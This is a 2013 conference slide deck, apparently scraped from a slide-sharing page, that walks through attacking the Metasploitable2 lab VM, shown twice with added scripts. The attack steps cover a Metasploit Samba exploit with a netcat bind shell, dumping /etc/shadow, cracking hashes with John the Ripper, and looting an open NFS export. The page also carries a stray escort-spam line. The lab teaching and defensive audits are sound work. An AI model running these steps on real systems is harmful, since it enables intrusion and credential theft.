“Improving your defensive security posture with offensive security strategies”
Andrew Kozma
HTCIA, Atlantic Chapter
Meeting April 18th, 2013
A bit about me…
• Infosec professional working in healthcare
• Co-founder of AtlSecCon
• Midnight ethical hacker
• A perpetual student
• Security researcher/philosopher
• Fan of the blues (secretly want to learn how to play the harmonica)
Offensive Security
“How much can you know about yourself if you've never been in a fight?”
~Chuck Palahniuk, Fight Club
• Hacking our own infrastructure to improve defensive security measures and processes
• Tools – Kali Linux, a security distro maintained by Offensive-Security with all the tools required to test security; it’s free and always will be
• Tactics – The application of tools
• Strategy – The big picture, all the pieces working together to achieve an ultimate goal
Creating a practice environment
“The first rule of fight club is, you don't talk about fight club.”
~Chuck Palahniuk, Fight Club
• The goal - a controlled environment where it is safe to practice offensive security techniques
• There are many vulnerable distributions that can serve as targets to help build skills (@g0tmi1k’s www.vulnhub.com)
• With proper planning and authorization, along with an understanding of the risks, you can test production infrastructure
• Virtualization is a beautiful thing!
Demo (metasploitable2)
• NMAP scan
  ◦ Identify OS, services and open ports
• Nessus vuln scan
  ◦ Run a scan to find vulnerabilities that can potentially be exploited
• Metasploit console
  ◦ Import the info
  ◦ Exploit the target
• Post exploitation
  ◦ Crack passwords with john
  ◦ PWN the box
Demo (nmap)
• Scanning with nmap
  -O  OS detection
  -sV  Service version
  -sC  NSE scripts
  -oX  Output in XML format
  --stylesheet nmap.xsl
  --open
  --reason
• Copying the stylesheet to our working directory
• Displaying the nmap scan in Iceweasel (Kali-Linux browser)
Demo (nmap output)
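The -oX file produced above is the same XML that Metasploit later imports with db_import; a defender can parse it just as easily to check what a host really exposes against an approved baseline. This is an added example, not code from the presentation: the nmap XML sample, the 192.0.2.10 address and the baseline are constructed for illustration.

```python
"""Parse nmap -oX output and flag open services that are not in an approved baseline."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample in the shape nmap -oX writes (not a real scan; versions illustrative).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -O -sV -sC --open --reason -oX scan.xml 192.0.2.10">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <hostnames><hostname name="lab-target" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="4.7p1"/>
      </port>
      <port protocol="tcp" portid="139">
        <state state="open" reason="syn-ack"/>
        <service name="netbios-ssn" product="Samba smbd" version="3.X"/>
      </port>
      <port protocol="tcp" portid="2049">
        <state state="open" reason="syn-ack"/>
        <service name="nfs" version="2-4"/>
      </port>
      <port protocol="tcp" portid="5900">
        <state state="open" reason="syn-ack"/>
        <service name="vnc" product="VNC" version="protocol 3.3"/>
      </port>
      <port protocol="tcp" portid="8080">
        <state state="closed" reason="reset"/>
      </port>
    </ports>
    <os><osmatch name="Linux 2.6.X" accuracy="96"/></os>
  </host>
</nmaprun>
"""


@dataclass(frozen=True)
class OpenService:
    host: str
    proto: str
    port: int
    name: str
    product: str
    version: str


def parse_open_services(xml_text):
    """Return every port reported as open, with whatever -sV learned about it."""
    root = ET.fromstring(xml_text)
    found = []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")  # absent when nothing was probed
            found.append(OpenService(
                host=ip,
                proto=port.get("protocol"),
                port=int(port.get("portid")),
                name=svc.get("name", "") if svc is not None else "",
                product=svc.get("product", "") if svc is not None else "",
                version=svc.get("version", "") if svc is not None else "",
            ))
    return found


def unexpected_services(services, baseline):
    """Return open services not in baseline, a dict {host: {(proto, port), ...}}."""
    return [s for s in services if (s.proto, s.port) not in baseline.get(s.host, set())]


# Constructed baseline: only SSH is approved on this host, so SMB, NFS and VNC are findings.
BASELINE = {"192.0.2.10": {("tcp", 22)}}

if __name__ == "__main__":
    for s in unexpected_services(parse_open_services(SAMPLE_NMAP_XML), BASELINE):
        print(f"UNEXPECTED {s.host} {s.proto}/{s.port} {s.name} {s.product} {s.version}".rstrip())
```

Run the scan again after remediation and an empty finding list is the evidence that the exposure is closed.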
Demo (Nessus)
• Nessus Vulnerability Scanner
• Not native to Kali-Linux
• Download and install
• dpkg -i “filename”
• Register for the Home feed (free)
• Connect to localhost port 8834
• Login and select new scan
Demo (Nessus)
• Launch the scan
• Nessus indicates the scan progress
• A summary is displayed once the scan is complete
Demo (Nessus)
• Export and save the report
Demo (Nessus Output)
Demo (metasploit)
• Opening the Metasploit Framework Console
• Enter the command “msfconsole”
• Importing our nmap scan results into the metasploit database
• Enter the command “db_import /path to the nmap scan”
Demo (metasploit)
• We can validate the db_import by entering the command “hosts” at the msf prompt
• We can also validate the services imported for that host from nmap by entering the command “services” at an msf prompt.
Demo (metasploit)
• Import the nessus scan into metasploit with the command “db_import /path to the file”
• Now that it is imported into metasploit we can view the vulnerabilities that nessus detected with the command “vulns”
Demo (metasploit)
• For this demo we are going to exploit samba
• Load the exploit in msf with the command: “use exploit/multi/samba/usermap_script”
• Once the exploit is loaded we can learn more about its functions via the command “info”
Demo (metasploit)
• The command “show options” indicates any variables that require a value to be set
• For this exploit a Remote Host is required to be identified. We will use the command: “set RHOST target.ip.address”
• A payload that will be delivered to the target is also required; we issue the command “set PAYLOAD cmd/unix/bind_netcat”
Demo (metasploit)
• The command “show options” now indicates the variables for RHOST and PAYLOAD that we previously defined
Demo (metasploit)
• We attack the target via the command “exploit”
• Booyah! Shell access to the target!
• We have root level access to the target and interact via this shell
• Let’s display the target system’s user accounts via the command “cat /etc/passwd”
• We are going to select the data displayed and copy it to a .txt file
Demo (metasploit)
• Now we need to grab the hashes associated with the user accounts we just viewed
• This can be done by displaying the hashes via the command “cat /etc/shadow”
• Once again we will be selecting the information displayed and will be copying it to a .txt file
Demo (Usernames and Hashes)
Demo (John The Ripper)
• We are going to use John The Ripper to crack the passwords for the user accounts
• For John to crack them we have to combine the usernames and their hash into a format that John can understand
• We combine both files into a single one for John to crack with the command: “unshadow /path/passwd.txt /path/shadow.txt > unshadowed.txt”
• We now have a file with usernames and hashes that John can use
Demo (John The Ripper)
• We are going to take a quick peek at the contents of the new file
• To do this we change to the directory the file resides in: “cd HTCIA”
• We can display the contents of this file in the terminal with the command “cat unshadowed.txt”
Demo (John The Ripper)
• To start cracking the passwords with John we issue the command: “john /path to the filename.txt”
• John has loaded the hashes and has successfully cracked some of the passwords
• Previously cracked passwords can be viewed with the command: “john --show /path to the file.txt”
Demo (Post Exploitation)
• Using our new creds to SSH to the exploited workstation
• To connect via SSH we use the command: “ssh -l msfadmin Target.IP.Address”
• Now we have a terminal session vs a shell
• In the real world we could continue to install backdoors, steal data, pivot to scan for other hosts
Demo (Post Exploitation)
• Let’s review other services so that we can maintain a persistent presence on the compromised workstation
• Hmmm, NFS services are running on the target…
Demo (Post Exploitation)
• Let’s take a quick look at the NFS share available on the target
• Uh oh… everything is shared
• We are going to create a temp directory and then mount the share in it
• Let’s display the filesystem to see the NFS share mounted in temp
Demo (Post Exploitation)
• Looking into the share that we mounted…
• We already know we can copy the contents of the passwd and shadow files again
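The “everything is shared” export found above is a configuration a defender can audit for before anyone mounts it. This is an added example, not from the presentation: it parses exports(5) syntax and flags entries exported to any client, with root squashing disabled, or exporting the root filesystem read-write. The sample /etc/exports content and the 192.0.2.x addresses are constructed.

```python
"""Audit /etc/exports for the kind of wide-open NFS share the demo stumbled on."""

# Constructed sample: "/" exported to everyone with root squashing disabled,
# plus two reasonably scoped exports that should not be flagged.
SAMPLE_EXPORTS = """# /etc/exports: NFS file systems being exported
/ *(rw,sync,no_root_squash,no_subtree_check)
/srv/backup 192.0.2.0/24(ro,sync)
/home/shared 192.0.2.50(rw,sync,root_squash)
"""

ANY_CLIENT = {"*", "0.0.0.0/0"}


def parse_exports(text):
    """Return (path, client, options) per client entry, in exports(5) syntax.

    Each line is a path followed by client specs; a spec looks like
    client(opt,opt) and option lists never contain whitespace, so splitting
    on whitespace separates the specs. A bare "(opts)" with no client name
    means the path is exported to every host, which exports(5) warns about.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        path, specs = parts[0], parts[1:]
        for tok in specs:
            if "(" in tok:
                client, _, opt_text = tok.partition("(")
                opts = {o.strip() for o in opt_text.rstrip(")").split(",") if o.strip()}
            else:
                client, opts = tok, set()  # no option list: exportfs defaults (ro, root_squash)
            if client == "":
                client = "*"
            entries.append((path, client, opts))
    return entries


def audit_exports(text):
    """Return (path, client, finding) tuples for export entries worth fixing."""
    findings = []
    for path, client, opts in parse_exports(text):
        if client in ANY_CLIENT:
            findings.append((path, client, "exported to any client"))
        if "no_root_squash" in opts:
            findings.append((path, client, "root squashing disabled (remote root is root on the share)"))
        if path == "/" and "rw" in opts:
            findings.append((path, client, "entire root filesystem exported read-write"))
    return findings


if __name__ == "__main__":
    for path, client, finding in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} -> {client}: {finding}")
```

Pair this with the nmap view of port 2049: an export that a host does not need to serve at all is better removed than scoped.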
Demo (Post Exploitation)
• Remember our Nessus output
• Collect as much information as possible during the information gathering phase…
• Sometimes you get lucky! The VNC server password was identified in the scan by Nessus
Breaking things to make them better
“At the time, my life just seemed too complete, and maybe we have to break everything to make something better out of ourselves.”
~Chuck Palahniuk, Fight Club
• When you start looking at production systems it is important to have a demonstrated, repeatable process that has buy-in from management
• Document your findings indicating the threat, the likelihood of occurrence and the impact to the business
• Use this information to build business cases for investment in security solutions
• When you start looking at the production environment… there will be blood….
Advanced Persistent Response
“On a long enough time line, the survival rate for everyone drops to zero.”
~Chuck Palahniuk, Fight Club
• Understanding trends and current threats
• Filling in the gaps with security (technology and process)
• Creating and implementing a security model that meets organizational needs
Incident Response
"With a gun barrel between your teeth, you speak only in vowels."
~Chuck Palahniuk, Fight Club
• Preparation
  ◦ Have a plan, know who to call and when
• Identification
  ◦ Determination of whether or not there was an incident
• Containment
  ◦ Protecting other critical systems: “stop the bleeding”
• Eradication
  ◦ Addressing the vulnerabilities that were exploited
• Recovery
  ◦ Returning to operational status
• Follow up
  ◦ Lessons learned, prevent future incidents of the same nature
Parting thoughts
• Do you still think the best defense is a good offense?
• IMHO ~ A good offense helps to make a great defense! (with proper planning and execution)
References
• Jeremy Druin @webpwnized has a great tutorial online going into more detail: http://www.youtube.com/watch?v=0fbBwGAuINw
• @netbiosx has a tutorial available online regarding NFS and metasploitable2: http://pentestlab.wordpress.com/2013/01/20/nfs-misconfiguration/
• Nessus software and home feed licensing can be found on their site: http://www.tenable.com/
• Kali-Linux can be obtained at www.kali.org and is maintained by Offensive-Security
• Metasploitable2 is maintained by Rapid7 and is available for download from: https://community.rapid7.com/docs/DOC-1875
• Why stop here! There are many other distros to help expand your skillset, check out @g0tmi1k and his website at http://vulnhub.com/
Thank you
• Twitter handle - @k0z1can
• ca.linkedin.com/in/andrewkozma/

WhatsApp 9892124323 âś“Call Girls In Kalyan ( Mumbai ) secure service
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 

The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter)

9. Demo (Nessus)
• Nessus Vulnerability Scanner
• Not native to Kali-Linux: download the Debian package and install it with dpkg -i "filename"
• Register for the Home feed (free for non-commercial use)
• Connect to localhost on port 8834 (the Nessus web interface runs over HTTPS)
• Log in and select New Scan

10. Demo (Nessus)
• Launch the scan
• Nessus indicates the scan progress
• A summary is displayed once the scan is complete

11. Demo (Nessus)
• Export and save the report (the .nessus export is the format Metasploit's db_import reads)

13. Demo (metasploit)
• Open the Metasploit Framework console with the command "msfconsole"
• Import the nmap scan results (the XML produced with -oX) into the Metasploit database with the command "db_import /path to the nmap scan"
• db_import needs a connected database; "db_status" at the msf prompt confirms the connection before you import anything

14. Demo (metasploit)
• Validate the import by entering the command "hosts" at the msf prompt
• Validate the services imported for that host from nmap by entering the command "services" at the msf prompt
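
The XML that db_import reads is plain text, and it is worth being able to summarise it without Metasploit, for instance to diff two scans or to check what is about to be imported. The following shell script is an added example, not code from the slides: it prints the nmap command line used in the demo for a given target (--stylesheet nmap.xsl assumes the stylesheet was copied into the working directory, as the nmap demo does; on Kali it lives at /usr/share/nmap/nmap.xsl) and reduces an nmap -oX file to one line per open port, the same view the msf "services" command gives after the import. The address 192.168.56.101, the banners and the XML itself are constructed for the demo, not real scan output.

```shell
#!/bin/sh
# Added example (not from the slides): build the demo's nmap command line and
# summarise an nmap -oX file into one line per open port, the same view the
# msf `services` command gives after db_import. The XML below is a constructed
# sample in nmap's output format, not a real scan, so this runs offline.

# The scan as the nmap demo ran it, for a target given as $1. Printed, not
# executed: run it yourself only against hosts you are authorised to scan.
nmap_cmd() {
    printf 'nmap -O -sV -sC --open --reason -oX %s.xml --stylesheet nmap.xsl %s\n' "$1" "$1"
}

# Constructed sample. nmap writes one <port> element per line, which is what
# lets the line-oriented parser below get away with sed instead of an XML library.
SAMPLE_XML='<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -O -sV -sC --reason -oX scan.xml 192.168.56.101">
<host starttime="1366300000"><status state="up" reason="arp-response" reason_ttl="0"/>
<address addr="192.168.56.101" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="21"><state state="open" reason="syn-ack" reason_ttl="64"/><service name="ftp" product="vsftpd" version="2.3.4" method="probed" conf="10"/></port>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="64"/><service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1" method="probed" conf="10"/></port>
<port protocol="tcp" portid="139"><state state="open" reason="syn-ack" reason_ttl="64"/><service name="netbios-ssn" product="Samba smbd" version="3.X - 4.X" method="probed" conf="10"/></port>
<port protocol="tcp" portid="445"><state state="open" reason="syn-ack" reason_ttl="64"/><service name="netbios-ssn" product="Samba smbd" version="3.0.20-Debian" method="probed" conf="10"/></port>
<port protocol="tcp" portid="8080"><state state="closed" reason="reset" reason_ttl="64"/><service name="http-proxy" method="table" conf="3"/></port>
</ports>
</host>
</nmaprun>'

# attr NAME LINE: value of the NAME="..." attribute in LINE, or empty if absent.
# The [ <] prefix keeps reason= from matching reason_ttl= and addr= from addrtype=.
attr() {
    printf '%s\n' "$2" | sed -n "s/.*[ <]$1=\"\([^\"]*\)\".*/\1/p"
}

# summarize_nmap_xml FILE: prints "host port/proto state reason service" for
# every open port. Closed and filtered ports are skipped, so the summary is the
# same whether or not the scan was run with --open.
summarize_nmap_xml() {
    host=''
    while IFS= read -r line; do
        case "$line" in
            *'<address addr="'*'addrtype="ipv4"'*)
                host=$(attr addr "$line") ;;
            '<port '*)
                state=$(attr state "$line")
                [ "$state" = open ] || continue
                port=$(attr portid "$line")
                proto=$(attr protocol "$line")
                reason=$(attr reason "$line")
                name=$(attr name "$line")
                product=$(attr product "$line")
                version=$(attr version "$line")
                printf '%s %s/%s %s %s %s%s%s\n' "$host" "$port" "$proto" "$state" "$reason" \
                    "$name" "${product:+ $product}" "${version:+ $version}" ;;
        esac
    done < "$1"
}

# Stand-alone run: write the sample to a temp file and summarise it.
demo_summary() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_XML" > "$tmp"
    summarize_nmap_xml "$tmp"
    rm -f "$tmp"
}

nmap_cmd 192.168.56.101
demo_summary
```

Keep the --reason output: it tells you why nmap believes a port is open (syn-ack versus, say, a filtered guess), which matters when you later hand the list to a vulnerability scanner and wonder why a "service" never answered.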

15. Demo (metasploit)
• Import the Nessus scan into Metasploit with the command "db_import /path to the file" (the .nessus export saved earlier)
• Once it is imported we can view the vulnerabilities Nessus detected with the command "vulns"

16. Demo (metasploit)
• For this demo we are going to exploit Samba
• Load the exploit in msf with the command "use exploit/multi/samba/usermap_script" (command injection through Samba's "username map script" setting, CVE-2007-2447; the Samba 3.0.20 build on Metasploitable2 is affected)
• Once the exploit is loaded we can learn more about it with the command "info"

17. Demo (metasploit)
• The command "show options" lists the variables that require a value
• This exploit needs the remote host identified: "set RHOST target.ip.address" (newer Metasploit releases name this option RHOSTS)
• It also needs a payload to deliver to the target: "set PAYLOAD cmd/unix/bind_netcat"
• A bind payload makes the target listen on a port and the attacker connect in; if a firewall blocks inbound connections to the target, use a reverse payload such as cmd/unix/reverse instead

18. Demo (metasploit)
• The command "show options" now shows the values we set for RHOST and PAYLOAD

19. Demo (metasploit)
• Attack the target with the command "exploit"
• Booyah! Shell access to the target!
• The shell runs as root, because smbd does, and we interact with the target through it
• Display the target's user accounts with the command "cat /etc/passwd"
• Select the output and copy it to a .txt file

20. Demo (metasploit)
• Now grab the hashes for the accounts we just viewed by displaying them with the command "cat /etc/shadow" (readable only because the shell is root)
• Once again select the output and copy it to a .txt file

22. Demo (John The Ripper)
• We use John The Ripper to crack the passwords for the user accounts
• John needs each username and its hash combined on one line, in passwd format
• Combine both files into one with the command "unshadow /path/passwd.txt /path/shadow.txt > unshadowed.txt"
• We now have a file with usernames and hashes that John can use

23. Demo (John The Ripper)
• Take a quick look at the contents of the new file
• Change to the directory the file resides in with "cd HTCIA"
• Display its contents in the terminal with the command "cat unshadowed.txt"

24. Demo (John The Ripper)
• Start cracking with the command "john /path to the filename.txt"
• John loads the hashes and cracks some of the passwords within seconds (the Metasploitable2 accounts use md5crypt hashes and short passwords)
• Cracked passwords are kept in ~/.john/john.pot and can be viewed again with the command "john --show /path to the file.txt"
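
An added example, not code from the slides, of the unshadow step in plain awk, followed by two checks worth running on the merged file before John starts: what kind of hash each account has (an empty field means login with no password at all, md5crypt and descrypt fall quickly, sha512crypt does not) and which accounts share an identical salt and hash, which means the same password, so one crack opens all of them. The passwd and shadow files are constructed samples in the Metasploitable2 layout with made-up hashes; the john commands at the end mirror the slides and are not run here.

```shell
#!/bin/sh
# Added example (not from the slides): rebuild what `unshadow` does with awk and
# audit the merged file before handing it to John, so you know which accounts
# are actually crackable. Both files are constructed samples that follow the
# Metasploitable2 layout; the hashes are made up, not real dumps.

PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
backup:x:34:34:backup:/var/backups:/bin/sh
guest:x:1003:1003:guest:/home/guest:/bin/bash
legacy:x:1004:1004:legacy:/home/legacy:/bin/sh'

SHADOW_SAMPLE='root:$1$aaaaaaaa$0123456789abcdefghijkl:15000:0:99999:7:::
daemon:*:15000:0:99999:7:::
msfadmin:$1$bbbbbbbb$abcdefghijkl0123456789:15000:0:99999:7:::
user:$1$cccccccc$zyxwvutsrqponmlkjihgfe:15000:0:99999:7:::
service:$1$dddddddd$ABCDEFGHIJKLMNOPQRSTUV:15000:0:99999:7:::
backup:$1$dddddddd$ABCDEFGHIJKLMNOPQRSTUV:15000:0:99999:7:::
guest::15000:0:99999:7:::
legacy:$6$eeeeeeee$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmn:15000:0:99999:7:::'

# unshadow_files PASSWD SHADOW: the same output as `unshadow PASSWD SHADOW`,
# i.e. the passwd file with field 2 replaced by the hash from shadow.
unshadow_files() {
    awk -F: -v OFS=: 'NR==FNR { hash[$1]=$2; next } { if ($1 in hash) $2=hash[$1]; print }' "$2" "$1"
}

# audit_hashes UNSHADOWED: one "user type" line per account. empty = login with
# no password, locked = * or ! prefix, no-shadow-entry = still "x" after the
# merge, otherwise the crypt scheme, which decides how fast John will get it.
audit_hashes() {
    awk -F: '{
        h=$2; t="unknown"
        if (h == "")                   t="empty"
        else if (h ~ /^[*!]/)          t="locked"
        else if (h == "x")             t="no-shadow-entry"
        else if (h ~ /^\$1\$/)         t="md5crypt"
        else if (h ~ /^\$5\$/)         t="sha256crypt"
        else if (h ~ /^\$6\$/)         t="sha512crypt"
        else if (length(h) == 13 && h ~ /^[.\/0-9A-Za-z]+$/) t="descrypt"
        print $1, t
    }' "$1"
}

# shared_hashes UNSHADOWED: accounts whose salt and hash are byte-identical.
# Same salt, same hash means same password (typical of cloned images), so
# cracking one of them gives you all of them.
shared_hashes() {
    awk -F: '$2 ~ /^\$/ {
        n[$2]++
        sep = (who[$2] == "") ? "" : ","
        who[$2] = who[$2] sep $1
    }
    END { for (h in n) if (n[h] > 1) print who[h] }' "$1"
}

# The John step from the demo. Not run here: needs john installed.
crack_with_john() {
    john "$1"          # single, wordlist and incremental modes, as in the slides
    john --show "$1"   # cracked creds, read back from ~/.john/john.pot
}

# Stand-alone run on the constructed samples.
demo_unshadow() {
    p=$(mktemp); s=$(mktemp); u=$(mktemp)
    printf '%s\n' "$PASSWD_SAMPLE" > "$p"
    printf '%s\n' "$SHADOW_SAMPLE" > "$s"
    unshadow_files "$p" "$s" > "$u"
    audit_hashes "$u"
    printf 'shared: %s\n' "$(shared_hashes "$u")"
    rm -f "$p" "$s" "$u"
}

demo_unshadow
```

On the defensive side the same audit is worth running against your own hosts: an account with an empty hash or a shared hash is a finding whether or not anyone ever runs John against it.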

25. Demo (Post Exploitation)
• Use our new creds to SSH to the exploited host
• Connect with the command "ssh -l msfadmin Target.IP.Address"
• Now we have a proper terminal session instead of the bind shell
• In the real world an attacker would continue from here: install backdoors, steal data, pivot to scan for other hosts

26. Demo (Post Exploitation)
• Review the other services so that we can maintain a persistent presence on the compromised host
• Hmmm, NFS services are running on the target…

27. Demo (Post Exploitation)
• Take a quick look at the NFS share available on the target
• Uh oh… everything is shared: the entire root filesystem is exported
• Create a temp directory and mount the share in it
• Display the filesystem to see the NFS share mounted in temp

28. Demo (Post Exploitation)
• Looking into the share that we mounted…
• We already know we can copy the contents of the passwd and shadow files again, this time straight off the share with no exploit needed
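
The NFS steps above as commands, plus the check the defender wants: an audit of /etc/exports for the options that make the demo possible. This is an added example, not code from the slides or the referenced tutorial. The exports file is a constructed sample; its first line is the pattern the slide calls "everything is shared" (the root filesystem exported to every client, writable, with no_root_squash, so a remote root user keeps root on the share). The nfs_grab function needs root, nfs-common and an authorised target, and is not run here.

```shell
#!/bin/sh
# Added example (not from the slides): the NFS steps of the demo as a function,
# and an audit of /etc/exports for the settings that make the demo work.
# EXPORTS_SAMPLE is a constructed file, not copied from any real host.

# What the demo does by hand. Not run here: needs root, nfs-common and a target
# you are authorised to touch. -o nolock avoids needing a local lock daemon.
nfs_grab() {
    showmount -e "$1"
    mkdir -p /tmp/nfs
    mount -t nfs -o nolock "$1":/ /tmp/nfs
    df -h /tmp/nfs
    cat /tmp/nfs/etc/shadow
}

EXPORTS_SAMPLE='# constructed /etc/exports sample
/               *(rw,sync,no_root_squash,no_subtree_check)
/srv/backup     192.168.56.0/24(ro,sync,root_squash)
/srv/scratch    (rw)
/home           10.0.0.5(rw,sync) *(ro,sync)'

# audit_exports FILE: one line per path/client pair, followed by the risky
# options spelled out: any-client (no client restriction, including a bare
# "(opts)" with no client at all), rw, no_root_squash, insecure (source ports
# above 1023 accepted) and root-fs (the whole filesystem exported). "ok" means
# none of those applied; it does not mean the export is needed.
audit_exports() {
    awk '
    /^[[:space:]]*#/ { next }
    NF == 0          { next }
    {
        path = $1
        if (NF == 1) $2 = "*"              # path with no client list: everyone, defaults
        for (i = 2; i <= NF; i++) {
            n = split($i, part, "(")
            client = part[1]
            opts = (n > 1) ? part[2] : ""
            sub(/\)$/, "", opts)
            if (client == "") client = "*"
            flags = ""
            if (client == "*")                      flags = flags " any-client"
            if (opts ~ /(^|,)rw(,|$)/)              flags = flags " rw"
            if (opts ~ /(^|,)no_root_squash(,|$)/)  flags = flags " no_root_squash"
            if (opts ~ /(^|,)insecure(,|$)/)        flags = flags " insecure"
            if (path == "/")                        flags = flags " root-fs"
            if (flags == "") flags = " ok"
            print path " " client flags
        }
    }' "$1"
}

# Stand-alone run on the constructed sample.
demo_audit() {
    f=$(mktemp)
    printf '%s\n' "$EXPORTS_SAMPLE" > "$f"
    audit_exports "$f"
    rm -f "$f"
}

demo_audit
```

The fix is the mirror image of the flags: an explicit client list, ro wherever the client does not need to write, and root_squash (the default whenever no_root_squash is not given), so that a remote root becomes nobody on the share instead of reading /etc/shadow off it.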

29. Demo (Post Exploitation)
• Remember our Nessus output
• Collect as much information as possible during the information gathering phase…
• Sometimes you get lucky! The VNC server password was identified in the scan by Nessus

30. Breaking things to make them better
• "At the time, my life just seemed too complete, and maybe we have to break everything to make something better out of ourselves." ~Chuck Palahniuk, Fight Club
• When you start looking at production systems it is important to have a demonstrated, repeatable process that has buy-in from management
• Document your findings, indicating the threat, the likelihood of occurrence and the impact to the business
• Use this information to build business cases for investment in security solutions
• When you start looking at the production environment… there will be blood…

32. Advanced Persistent Response
• "On a long enough time line, the survival rate for everyone drops to zero." ~Chuck Palahniuk, Fight Club
• Understanding trends and current threats
• Filling in the gaps with security (technology and process)
• Creating and implementing a security model that meets organizational needs

33. Incident Response
• "With a gun barrel between your teeth, you speak only in vowels." ~Chuck Palahniuk, Fight Club
• Preparation
  ◦ Have a plan, know who to call and when
• Identification
  ◦ Determination of whether or not there was an incident
• Containment
  ◦ Protecting other critical systems: "stop the bleeding"
• Eradication
  ◦ Addressing the vulnerabilities that were exploited
• Recovery
  ◦ Returning to operational status
• Follow up
  ◦ Lessons learned, prevent future incidents of the same nature

34. Parting thoughts
• Do you still think the best defense is a good offense?
• IMHO ~ A good offense helps to make a great defense! (with proper planning and execution)

35. References
• Jeremy Druin (@webpwnized) has a great tutorial online going into more detail: http://www.youtube.com/watch?v=0fbBwGAuINw
• @netbiosx has a tutorial available online regarding NFS and Metasploitable2: http://pentestlab.wordpress.com/2013/01/20/nfs-misconfiguration/
• Nessus software and Home feed licensing can be found on Tenable's site: http://www.tenable.com/
• Kali-Linux can be obtained at www.kali.org and is maintained by Offensive-Security
• Metasploitable2 is maintained by Rapid7 and is available for download from: https://community.rapid7.com/docs/DOC-1875
• Why stop here! There are many other distros to help expand your skillset; check out @g0tmi1k and his website at http://vulnhub.com/

36. Thank you
• Twitter handle: @k0z1can
• ca.linkedin.com/in/andrewkozma/